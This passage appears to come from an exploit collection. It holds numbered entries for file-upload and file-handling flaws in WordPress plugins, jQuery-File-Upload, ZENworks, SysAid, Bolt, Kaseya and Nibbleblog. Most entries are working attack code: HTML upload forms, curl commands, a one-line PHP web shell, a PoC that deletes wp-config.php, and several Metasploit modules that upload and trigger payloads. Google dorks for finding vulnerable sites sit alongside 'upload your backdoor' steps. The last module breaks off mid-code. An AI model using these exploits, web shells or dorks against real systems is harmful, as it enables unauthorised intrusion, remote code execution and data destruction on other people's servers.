# Vendor Homepage : jssor.com - drcsystems.com - ethicsolutions.com - wordpress.org/plugins/jssor-slider/
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-284 [ Improper Access Control ] - CWE-862 [ Missing Authorization ]
# CXSecurity : cxsecurity.com/ascii/WLB-2018060226
#####################################################################################################
Description : “Jssor Slider by jssor.com” is open source software. Jssor Slider is a professional, lightweight and easy to use slideshow/slider/gallery/carousel/banner; it is optimized for mobile devices with tons of unique features.
# Key Features : Touch Swipe - 200+ Slideshow Transitions - Layer Animation - Fast Loading, load slider html code from disk cache directly - High Performance Light Weight - Easy to Use - Repeated Layer Animation - Image Layer - Text/Html Layer - Panel Layer - Nested Layer - Layer Blending - Clip Mask Multiplex Transition - z-index Animation - Timeline Break - Dozens of bullet/arrow/thumbnail skins
#####################################################################################################
Affected Jssor Slider Plugin Code :
When the plugin is active the function register_ajax_calls() in the file /lib/jssor-slider-class.php is run:

```php
public function register_ajax_calls() {
    if ( isset( $_REQUEST['action'] ) ) {
        switch ( $_REQUEST['action'] ) {
            case 'add_new_slider_library' :
                add_action( 'admin_init', 'jssor_slider_library' );
                function jssor_slider_library() {
                    include_once JSSOR_SLIDER_PATH . '/lib/add-new-slider-class.php';
                }
                break;
            case 'upload_library' :
                add_action( 'admin_init', 'upload_library' );
                function upload_library() {
                    include_once JSSOR_SLIDER_PATH . '/lib/upload.php';
                }
                break;
        }
    }
}
```

That gives anyone access to two AJAX functions that are only intended to be accessible to those logged in as Administrators. The upload_library() function accessible through that handles uploading a file through /lib/upload.php. That file also doesn’t do any checks as to who is making the request and does not restrict what type of files can be uploaded.
It is also possible to exploit this by sending a request directly to the file /lib/upload.php, as long as the undefined constant in that isn’t treated as an error. The following proof of concept will upload the selected file to the directory /wp-content/jssor-slider/jssor-uploads/. Make sure to replace “[path to WordPress]” with the location of WordPress.
#####################################################################################################
# Google Dorks : inurl:''/wp-content/jssor-slider/jssor-uploads/''
intext:''Managed by Web development company Ethic Solutions''
intext:''Todos los derechos reservados © Ecuaauto - Distribuidor autorizado Chevrolet Ecuador''
intext:''Website Developed by DRC Systems''
#####################################################################################################
# PoC : /wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
# Error : {"jsonrpc" : "2.0", "result" : null, "id" : "id"}
# Exploit Code :

```html
<html>
<body>
<form action="http://[PATH]/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library" method="POST" enctype="multipart/form-data" >
<input type="file" name="file" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
```

# Uploaded File Path : /wp-content/jssor-slider/jssor-uploads/.....
# Allowed File Extensions : php and asp are not allowed, but all other file extensions are allowed, for example html, txt, etcetera.
# Usage : Use with XAMPP Control Panel and with your Localhost [ 127.0.0.1 ] localhost/jssorsliderexploiter.html
#################################################################################################
# Example All Vulnerable Sites =>
############################################################################
Reference [ Me ] : cyberizm.org/cyberizm-wordpress-drcsystems-ethicsolutions-jssorslider-exploit.html
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
9. ***************************************************
# Exploit Title: Đăng nhập Arbitrary File Upload
# Google Dork: intext:Đăng nhập. Xác nhận. inurl:/xadmin
# Exploit: /dipnotpanel/js/tinymce/plugins/fileman/php/upload.php
# Date: 12/10/2018
# Author: 0N3R1D3R
# Team: Indonesia To World Team
# Tested on: Windows 10 x64
***************************************************
[+] Search the dork in Google
[+] Exploit the site with /editor/fileman/aklsdjfklsdjflksdkl.html
[+] Upload your backdoor with bypass ext
***************************************************
[+] Demo Site
***************************************************
Thanks To Indonesia To World Team
10. Title: jQuery-File-Upload <= v9.22.0 unauthenticated arbitrary file upload vulnerability
Author: Larry W. Cashdollar, @_larry0
Date: 2018-10-09
CVE-ID: [CVE-none]
Download Site: https://github.com/blueimp/jQuery-File-Upload/releases
Vendor: https://github.com/blueimp
Vendor Notified: 2018-10-09
Vendor Contact:
Advisory: http://www.vapidlabs.com/advisory.php?v=204

Description: File Upload widget with multiple file selection, drag&drop support, progress bar, validation and preview images, audio and video for jQuery. Supports cross-domain, chunked and resumable file uploads. Works with any server-side platform (Google App Engine, PHP, Python, Ruby on Rails, Java, etc.) that supports standard HTML form file uploads.

Vulnerability: The code in https://github.com/blueimp/jQuery-File-Upload/blob/master/server/php/UploadHandler.php doesn't require any validation to upload files to the server. It also doesn't exclude file types. This allows for remote code execution. This has been actively exploited in the wild for over a year.

Exploit Code:
$ curl -F "files=@shell.php" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php

Where shell.php is:
<?php $cmd=$_GET['cmd']; system($cmd);?>
11. ***************************************************
# Exploit Title: Dipnot Yönetim Paneli Arbitrary File Upload
# Google Dork: inurl:/dipnotpanel/js/tinymce/plugins/fileman
# Exploit: /dipnotpanel/js/tinymce/plugins/fileman/php/upload.php
# Date: 03/10/2018
# Author: 0N3R1D3R
# Team: Indonesia To World Team
# Tested on: Windows 10 x64
***************************************************
[+] Search the dork in Google
[+] Exploit the site with /dipnotpanel/js/tinymce/plugins/fileman/php/upload.php
[+] Upload your file with csrf, post file files[]
[+] Upload shell must with bypass ext
[+] Access the site with /dipnotpanel/js/tinymce/plugins/fileman/Uploads/file.jpg
***************************************************
[+] Demo Site
***************************************************
Thanks To Indonesia To World Team
12. # Exploit Title: Wordpress 4.9.6 Arbitrary File Deletion Vulnerability
# Google Dork: N/A
# Date: 2018-09-3
# Exploit Author: Rednofozi
# Vendor Homepage: http://www.wordpress.org
# Software Link: http://www.wordpress.org/download
# Affected Version: 4.9.6
# Tested on: php7 mysql5
# CVE : N/A
# Proof Of Concept
**************************************************************************
Step 1:
```
curl -v 'http://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php'
```
Step 2:
```
curl -v 'http://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=delete&_wpnonce=***'
```
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Discovered by : Rednofozi
#--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow
http://www.exploit4arab.org/exploits/2000
13. ```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress RevSlider File Upload and Execute Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary PHP code upload in the WordPress ThemePunch
        Revolution Slider ( revslider ) plugin, version 3.0.95 and prior. The vulnerability
        allows for arbitrary file upload and remote code execution.
      },
      'Author'         =>
        [
          'Simo Ben youssef', # Vulnerability discovery
          'Tom Sellers <tom[at]fadedcode.net>' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['URL', 'https://whatisgon.wordpress.com/2014/11/30/another-revslider-vulnerability/'],
          ['EDB', '35385'],
          ['WPVDB', '7954'],
          ['OSVDB', '115118']
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['ThemePunch Revolution Slider (revslider) 3.0.95', {}]],
      'DisclosureDate' => 'Nov 26 2015',
      'DefaultTarget'  => 0)
    )
  end

  def check
    release_log_url = normalize_uri(wordpress_url_plugins, 'revslider', 'release_log.txt')
    check_version_from_custom_file(release_log_url, /^\s*(?:version)\s*(\d{1,2}\.\d{1,2}(?:\.\d{1,2})?).*$/mi, '3.0.96')
  end

  def exploit
    php_pagename = rand_text_alpha(4 + rand(4)) + '.php'

    # Build the zip
    payload_zip = Rex::Zip::Archive.new
    # If the filename in the zip is revslider.php it will be automatically
    # executed but it will break the plugin and sometimes WordPress
    payload_zip.add_file('revslider/' + php_pagename, payload.encoded)

    # Build the POST body
    data = Rex::MIME::Message.new
    data.add_part('revslider_ajax_action', nil, nil, 'form-data; name="action"')
    data.add_part('update_plugin', nil, nil, 'form-data; name="client_action"')
    data.add_part(payload_zip.pack, 'application/x-zip-compressed', 'binary', "form-data; name=\"update_file\"; filename=\"revslider.zip\"")
    post_data = data.to_s

    res = send_request_cgi(
      'uri'    => wordpress_url_admin_ajax,
      'method' => 'POST',
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    )

    if res
      if res.code == 200 && res.body =~ /Update in progress/
        # The payload itself is almost never deleted, try anyway
        register_files_for_cleanup(php_pagename)
        # This normally works
        register_files_for_cleanup('../revslider.zip')

        final_uri = normalize_uri(wordpress_url_plugins, 'revslider', 'temp', 'update_extract', 'revslider', php_pagename)
        print_good("#{peer} - Our payload is at: #{final_uri}")
        print_status("#{peer} - Calling payload...")
        send_request_cgi(
          'uri'     => normalize_uri(final_uri),
          'timeout' => 5
        )
      elsif res.code == 200 && res.body =~ /^0$/
        # admin-ajax.php returns 0 if the 'action' 'revslider_ajax_action' is unknown
        fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable or the plugin is deactivated")
      else
        fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
      end
    else
      fail_with(Failure::Unknown, 'ERROR')
    end
  end
end
```
14. ```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Novell ZENworks Configuration Management Arbitrary File Upload',
      'Description'    => %q{
        This module exploits a file upload vulnerability in Novell ZENworks Configuration
        Management (ZCM, which is part of the ZENworks Suite). The vulnerability exists in
        the UploadServlet which accepts unauthenticated file uploads and does not check the
        "uid" parameter for directory traversal characters. This allows an attacker to write
        anywhere in the file system, and can be abused to deploy a WAR file in the Tomcat
        webapps directory. ZCM up to (and including) 11.3.1 is vulnerable to this attack.
        This module has been tested successfully with ZCM 11.3.1 on Windows and Linux.
        Note that this is a similar vulnerability to ZDI-10-078 / OSVDB-63412 which also has
        a Metasploit exploit, but it abuses a different parameter of the same servlet.
      },
      'Author'         =>
        [
          'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2015-0779'],
          ['OSVDB', '120382'],
          ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/zenworks_zcm_rce.txt'],
          ['URL', 'http://seclists.org/fulldisclosure/2015/Apr/21']
        ],
      'DefaultOptions' => { 'WfsDelay' => 30 },
      'Privileged'     => true,
      'Platform'       => 'java',
      'Arch'           => ARCH_JAVA,
      'Targets'        =>
        [
          [ 'Novell ZCM < v11.3.2 - Universal Java', { } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Apr 7 2015'))

    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [true, 'Use SSL', true]),
        OptString.new('TARGETURI', [true, 'The base path to ZCM / ZENworks Suite', '/zenworks/']),
        OptString.new('TOMCAT_PATH', [false, 'The Tomcat webapps traversal path (from the temp directory)'])
      ], self.class)
  end

  def check
    res = send_request_cgi({
      'uri'    => normalize_uri(datastore['TARGETURI'], 'UploadServlet'),
      'method' => 'GET'
    })

    if res && res.code == 200 && res.body.to_s =~ /ZENworks File Upload Servlet/
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end

  def upload_war_and_exec(tomcat_path)
    app_base = rand_text_alphanumeric(4 + rand(32 - 4))
    war_payload = payload.encoded_war({ :app_name => app_base }).to_s

    print_status("#{peer} - Uploading WAR file to #{tomcat_path}")
    res = send_request_cgi({
      'uri'      => normalize_uri(datastore['TARGETURI'], 'UploadServlet'),
      'method'   => 'POST',
      'data'     => war_payload,
      'ctype'    => 'application/octet-stream',
      'vars_get' => {
        'uid'      => tomcat_path,
        'filename' => "#{app_base}.war"
      }
    })

    if res && res.code == 200
      print_status("#{peer} - Upload appears to have been successful")
    else
      print_error("#{peer} - Failed to upload, try again with a different path?")
      return false
    end

    10.times do
      Rex.sleep(2)

      # Now make a request to trigger the newly deployed war
      print_status("#{peer} - Attempting to launch payload in deployed WAR...")
      send_request_cgi({
        'uri'    => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
        'method' => 'GET'
      })
      # Failure. The request timed out or the server went away.
      break if res.nil?
      # Failure. Unexpected answer
      break if res.code != 200
      # Unless session... keep looping
      return true if session_created?
    end

    false
  end

  def exploit
    tomcat_paths = []
    if datastore['TOMCAT_PATH']
      tomcat_paths << datastore['TOMCAT_PATH']
    end

    tomcat_paths.concat(['../../../opt/novell/zenworks/share/tomcat/webapps/', '../webapps/'])

    tomcat_paths.each do |tomcat_path|
      break if upload_war_and_exec(tomcat_path)
    end
  end
end
```
15. ```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'zlib'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "SysAid Help Desk 'rdslogs' Arbitrary File Upload",
      'Description'    => %q{
        This module exploits a file upload vulnerability in SysAid Help Desk v14.3 and v14.4.
        The vulnerability exists in the RdsLogsEntry servlet which accepts unauthenticated
        file uploads and handles zip file contents in an insecure way. By combining both
        weaknesses, a remote attacker can accomplish remote code execution. Note that this
        will only work if the target is running Java 6 or 7 up to 7u25, as Java 7u40 and
        above introduces a protection against null byte injection in file names. This module
        has been tested successfully on version v14.3.12 b22 and v14.4.32 b25 in Linux. In
        theory this module also works on Windows, but SysAid seems to bundle Java 7u40 and
        above with the Windows package which prevents the vulnerability from being exploited.
      },
      'Author'         =>
        [
          'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2015-2995' ],
          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ],
          [ 'URL', 'http://seclists.org/fulldisclosure/2015/Jun/8' ]
        ],
      'DefaultOptions' => { 'WfsDelay' => 30 },
      'Privileged'     => false,
      'Platform'       => 'java',
      'Arch'           => ARCH_JAVA,
      'Targets'        =>
        [
          [ 'SysAid Help Desk v14.3 - 14.4 / Java Universal', { } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jun 3 2015'))

    register_options(
      [
        Opt::RPORT(8080),
        OptInt.new('SLEEP', [true, 'Seconds to sleep while we wait for WAR deployment', 15]),
        OptString.new('TARGETURI', [true, 'Base path to the SysAid application', '/sysaid/'])
      ], self.class)
  end

  def check
    servlet_path = 'rdslogs'
    bogus_file = rand_text_alphanumeric(4 + rand(32 - 4))
    res = send_request_cgi({
      'uri'      => normalize_uri(datastore['TARGETURI'], servlet_path),
      'method'   => 'POST',
      'vars_get' => { 'rdsName' => bogus_file }
    })

    if res && res.code == 200
      return Exploit::CheckCode::Detected
    end

    # Fall back to an explicit result instead of returning nil
    Exploit::CheckCode::Safe
  end

  def exploit
    app_base = rand_text_alphanumeric(4 + rand(32 - 4))
    tomcat_path = '../../../../'
    servlet_path = 'rdslogs'

    # We need to create the upload directories before our first attempt to upload the WAR.
    print_status("#{peer} - Creating upload directory")
    bogus_file = rand_text_alphanumeric(4 + rand(32 - 4))
    send_request_cgi({
      'uri'      => normalize_uri(datastore['TARGETURI'], servlet_path),
      'method'   => 'POST',
      'data'     => Zlib::Deflate.deflate(rand_text_alphanumeric(4 + rand(32 - 4))),
      'ctype'    => 'application/xml',
      'vars_get' => { 'rdsName' => bogus_file }
    })

    war_payload = payload.encoded_war({ :app_name => app_base }).to_s

    # We have to use the Zlib deflate routine as the Metasploit Zip API seems to fail
    print_status("#{peer} - Uploading WAR file...")
    res = send_request_cgi({
      'uri'      => normalize_uri(datastore['TARGETURI'], servlet_path),
      'method'   => 'POST',
      'data'     => Zlib::Deflate.deflate(war_payload),
      'ctype'    => 'application/octet-stream',
      'vars_get' => { 'rdsName' => "#{tomcat_path}/tomcat/webapps/#{app_base}.war\x00" }
    })

    # The server returns a 200 OK when the upload is successful.
    if res && res.code == 200
      print_status("#{peer} - Upload appears to have been successful, waiting #{datastore['SLEEP']} seconds for deployment")
      register_files_for_cleanup("tomcat/webapps/#{app_base}.war")
    else
      fail_with(Failure::Unknown, "#{peer} - WAR upload failed")
    end

    10.times do
      select(nil, nil, nil, 2)

      # Now make a request to trigger the newly deployed war
      print_status("#{peer} - Attempting to launch payload in deployed WAR...")
      res = send_request_cgi({
        'uri'    => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
        'method' => 'GET'
      })

      # Failure. The request timed out or the server went away.
      break if res.nil?
      # Success! Triggered the payload, should have a shell incoming
      break if res.code == 200
    end
  end
end
```
16. ############################################
# Title : TI Online Examination System v2 - Arbitrary File Download
# Author : Rednofozi
# category : webapps
# Tested On : Kali Linux
# my team: https://anonysec.org
# me : Rednofozi@yahoo.com
# Vendor HomePage : https://codecanyon.net/item/ti-online-examination-system-v2/11248904
# Google Dork: inurl:N/A
# Description : The "Export" operation in the admin panel is vulnerable. The attacker can download and read all files known by name via "download.php"
############################################
# search google Dork : N/A
#################### Proof of Concept #############
Demo : server/admin/
# Vuln file : /admin/download.php (lines 115-120)

```php
$data_action = $_REQUEST['action'];
if($data_action == 'downloadfile')
{
    $file = $_REQUEST['file'];
    $name = $file;
    $result = output_file($file, $name);
```

# PoC : http://server/admin/download.php?action=downloadfile&file=[filename]
you can write the known file name instead of [filename]. For Example: 'download.php' or 'index.php'
######################
# Discovered by : Rednofozi
#--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow
http://www.exploit4arab.org/exploits/1987
17. ```ruby
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(
      info,
      'Name'           => 'CMS Bolt File Upload Vulnerability',
      'Description'    => %q{
        Bolt CMS contains a flaw that allows an authenticated remote attacker to execute
        arbitrary PHP code. This module was tested on version 2.2.4.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Tim Coen', # Vulnerability Disclosure
          'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
        ],
      'References'     =>
        [
          ['URL', 'http://blog.curesec.com/article/blog/Bolt-224-Code-Execution-44.html']
        ],
      'DisclosureDate' => 'Aug 17 2015',
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Bolt 2.2.4', {}]],
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to the web application', '/']),
        OptString.new('FOLDERNAME', [true, 'The theme path to the web application (default: base-2014)', 'base-2014']),
        OptString.new('USERNAME', [true, 'The username to authenticate with']),
        OptString.new('PASSWORD', [true, 'The password to authenticate with'])
      ], self.class)
  end

  def check
    cookie = bolt_login(username, password)
    return Exploit::CheckCode::Detected unless cookie

    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, 'bolt'),
      'cookie' => cookie
    )

    if res && res.code == 200 && res.body.include?('Bolt 2.2.4</b>: Sophisticated, lightweight & simple CMS')
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
  end

  def username
    datastore['USERNAME']
  end

  def password
    datastore['PASSWORD']
  end

  def fname
    datastore['FOLDERNAME']
  end

  def bolt_login(user, pass)
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, 'bolt', 'login')
    )

    fail_with(Failure::Unreachable, 'No response received from the target.') unless res

    session_cookie = res.get_cookies
    vprint_status("#{peer} - Logging in...")
    res = send_request_cgi(
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'bolt', 'login'),
      'cookie'    => session_cookie,
      'vars_post' => {
        'username' => user,
        'password' => pass,
        'action'   => 'login'
      }
    )

    return res.get_cookies if res && res.code == 302 && res.redirection.to_s.include?('/bolt')
    nil
  end

  def get_token(cookie, fname)
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri, 'bolt', 'files', 'theme', fname),
      'cookie' => cookie
    )

    if res && res.code == 200 && res.body =~ / name="form\[_token\]" value="(.+)" /
      return Regexp.last_match[1]
    end
    nil
  end

  def rename_payload(cookie, payload, fname)
    res = send_request_cgi(
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'async', 'renamefile'),
      'vars_post' => {
        'namespace' => 'theme',
        'parent'    => fname,
        'oldname'   => "#{payload}.png",
        'newname'   => "#{payload}.php"
      },
      'cookie'    => cookie
    )

    return true if res && res.code == 200 && res.body.include?('1')
    nil
  end

  def exploit
    vprint_status("#{peer} - Authenticating using #{username}:#{password}")
    cookie = bolt_login(username, password)
    fail_with(Failure::NoAccess, 'Unable to login. Verify USERNAME/PASSWORD or TARGETURI.') if cookie.nil?
    vprint_good("#{peer} - Authenticated with Bolt.")

    token = get_token(cookie, fname)
    fail_with(Failure::Unknown, 'No token found.') if token.nil?
    vprint_good("#{peer} - Token \"#{token}\" found.")

    vprint_status("#{peer} - Preparing payload...")
    payload_name = Rex::Text.rand_text_alpha_lower(10)

    data = Rex::MIME::Message.new
    data.add_part(payload.encoded, 'image/png', nil, "form-data; name=\"form[FileUpload][]\"; filename=\"#{payload_name}.png\"")
    data.add_part("#{token}", nil, nil, 'form-data; name="form[_token]"')
    post_data = data.to_s

    vprint_status("#{peer} - Uploading payload...")
    res = send_request_cgi(
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri, 'bolt', 'files', 'theme', fname),
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data,
      'cookie' => cookie
    )

    fail_with(Failure::Unknown, 'Unable to upload payload.') unless res && res.code == 302
    vprint_good("#{peer} - Uploaded the payload.")

    rename = rename_payload(cookie, payload_name, fname)
    fail_with(Failure::Unknown, 'No renamed filename.') if rename.nil?

    php_file_name = "#{payload_name}.php"
    payload_url = normalize_uri(target_uri.path, 'theme', fname, php_file_name)
    vprint_status("#{peer} - Parsed response.")

    register_files_for_cleanup(php_file_name)

    vprint_status("#{peer} - Executing the payload at #{payload_url}.")
    send_request_cgi(
      'uri'    => payload_url,
      'method' => 'GET'
    )
  end
end
```
18. ```ruby
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Kaseya VSA uploader.aspx Arbitrary File Upload',
      'Description'    => %q{
        This module exploits an arbitrary file upload vulnerability found in Kaseya VSA
        versions between 7 and 9.1. A malicious unauthenticated user can upload an ASP file
        to an arbitrary directory leading to arbitrary code execution with IUSR privileges.
        This module has been tested with Kaseya v7.0.0.17, v8.0.0.10 and v9.0.0.3.
      },
      'Author'         =>
        [
          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and updated MSF module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2015-6922'],
          ['ZDI', '15-449'],
          ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/kaseya-vsa-vuln-2.txt'],
          ['URL', 'http://seclists.org/bugtraq/2015/Sep/132']
        ],
      'Platform'       => 'win',
      'Arch'           => ARCH_X86,
      'Privileged'     => false,
      'Targets'        =>
        [
          [ 'Kaseya VSA v7 to v9.1', {} ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Sep 23 2015'))
  end

  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri('ConfigTab', 'uploader.aspx')
    })

    if res && res.code == 302 && res.body && res.body.to_s =~ /mainLogon\.asp\?logout=([0-9]*)/
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Unknown
    end
  end

  def upload_file(payload, path, filename, session_id)
    print_status("#{peer} - Uploading payload to #{path}...")
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri('ConfigTab', 'uploader.aspx'),
      'vars_get' => {
        'PathData' => path,
        'qqfile'   => filename
      },
      'data'     => payload,
      'ctype'    => 'application/octet-stream',
      'cookie'   => 'sessionId=' + session_id
    })

    if res && res.code == 200 && res.body && res.body.to_s.include?('"success": "true"')
      return true
    else
      return false
    end
  end

  def exploit
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri('ConfigTab', 'uploader.aspx')
    })

    if res && res.code == 302 && res.body && res.body.to_s =~ /mainLogon\.asp\?logout=([0-9]*)/
      session_id = $1
    else
      fail_with(Failure::NoAccess, "#{peer} - Failed to create a valid session")
    end

    asp_name = "#{rand_text_alpha_lower(8)}.asp"
    exe = generate_payload_exe
    payload = Msf::Util::EXE.to_exe_asp(exe).to_s

    paths = [
      # We have to guess the path, so just try the most common directories
      'C:\\Kaseya\\WebPages\\',
      'C:\\Program Files\\Kaseya\\WebPages\\',
      'C:\\Program Files (x86)\\Kaseya\\WebPages\\',
      'D:\\Kaseya\\WebPages\\',
      'D:\\Program Files\\Kaseya\\WebPages\\',
      'D:\\Program Files (x86)\\Kaseya\\WebPages\\',
      'E:\\Kaseya\\WebPages\\',
      'E:\\Program Files\\Kaseya\\WebPages\\',
      'E:\\Program Files (x86)\\Kaseya\\WebPages\\',
    ]

    paths.each do |path|
      if upload_file(payload, path, asp_name, session_id)
        register_files_for_cleanup(path + asp_name)
        print_status("#{peer} - Executing payload #{asp_name}")
        send_request_cgi({
          'uri'    => normalize_uri(asp_name),
          'method' => 'GET'
        })
        # Failure. The request timed out or the server went away.
        break if res.nil?
        # Success! Triggered the payload, should have a shell incoming
        break if res.code == 200
      end
    end
  end
end
```
19.

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(
      info,
      'Name'            => 'Nibbleblog File Upload Vulnerability',
      'Description'     => %q{
        Nibbleblog contains a flaw that allows a authenticated remote attacker
        to execute arbitrary PHP code. This module was tested on version 4.0.3.
      },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'Unknown', # Vulnerability Disclosure - Curesec Research Team. Author's name?
          'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
        ],
      'References'      =>
        [
          ['URL', 'http://blog.curesec.com/article/blog/NibbleBlog-403-Code-Execution-47.html']
        ],
      'DisclosureDate'  => 'Sep 01 2015',
      'Platform'        => 'php',
      'Arch'            => ARCH_PHP,
      'Targets'         => [['Nibbleblog 4.0.3', {}]],
      'DefaultTarget'   => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to the web application', '/']),
        OptString.new('USERNAME', [true, 'The username to authenticate with']),
        OptString.new('PASSWORD', [true, 'The password to authenticate with'])
      ], self.class)
  end

  def username
    datastore['USERNAME']
  end

  def password
    datastore['PASSWORD']
  end

  def check
    cookie = do_login(username, password)
    return Exploit::CheckCode::Detected unless cookie

    res = send_request_cgi(
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, 'admin.php'),
      'cookie'   => cookie,
      'vars_get' => {
        'controller' => 'settings',
        'action'     => 'general'
      }
    )

    if res && res.code == 200 && res.body.include?('Nibbleblog 4.0.3 "Coffee"')
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Safe
  end

  def do_login(user, pass)
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, 'admin.php')
    )

    fail_with(Failure::Unreachable, 'No response received from the target.') unless res

    session_cookie = res.get_cookies
    vprint_status("#{peer} - Logging in...")
    res = send_request_cgi(
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'admin.php'),
      'cookie'    => session_cookie,
      'vars_post' => {
        'username' => user,
        'password' => pass
      }
    )

    return session_cookie if res && res.code == 302 && res.headers['Location']
    nil
  end

  def exploit
    unless [
      Exploit::CheckCode::Detected,
      Exploit::CheckCode::Appears
    ].include?(check)
      print_error("Target does not appear to be vulnerable.")
      return
    end

    vprint_status("#{peer} - Authenticating using #{username}:#{password}")
    cookie = do_login(username, password)
    fail_with(Failure::NoAccess, 'Unable to login. Verify USERNAME/PASSWORD or TARGETURI.') if cookie.nil?
    vprint_good("#{peer} - Authenticated with Nibbleblog.")

    vprint_status("#{peer} - Preparing payload...")
    payload_name = "#{Rex::Text.rand_text_alpha_lower(10)}.php"

    data = Rex::MIME::Message.new
    data.add_part('my_image', nil, nil, 'form-data; name="plugin"')
    data.add_part('My image', nil, nil, 'form-data; name="title"')
    data.add_part('4', nil, nil, 'form-data; name="position"')
    data.add_part('', nil, nil, 'form-data; name="caption"')
    data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"image\"; filename=\"#{payload_name}\"")
    data.add_part('1', nil, nil, 'form-data; name="image_resize"')
    data.add_part('230', nil, nil, 'form-data; name="image_width"')
    data.add_part('200', nil, nil, 'form-data; name="image_height"')
    data.add_part('auto', nil, nil, 'form-data; name="image_option"')

    post_data = data.to_s

    vprint_status("#{peer} - Uploading payload...")
    res = send_request_cgi(
      'method'   => 'POST',
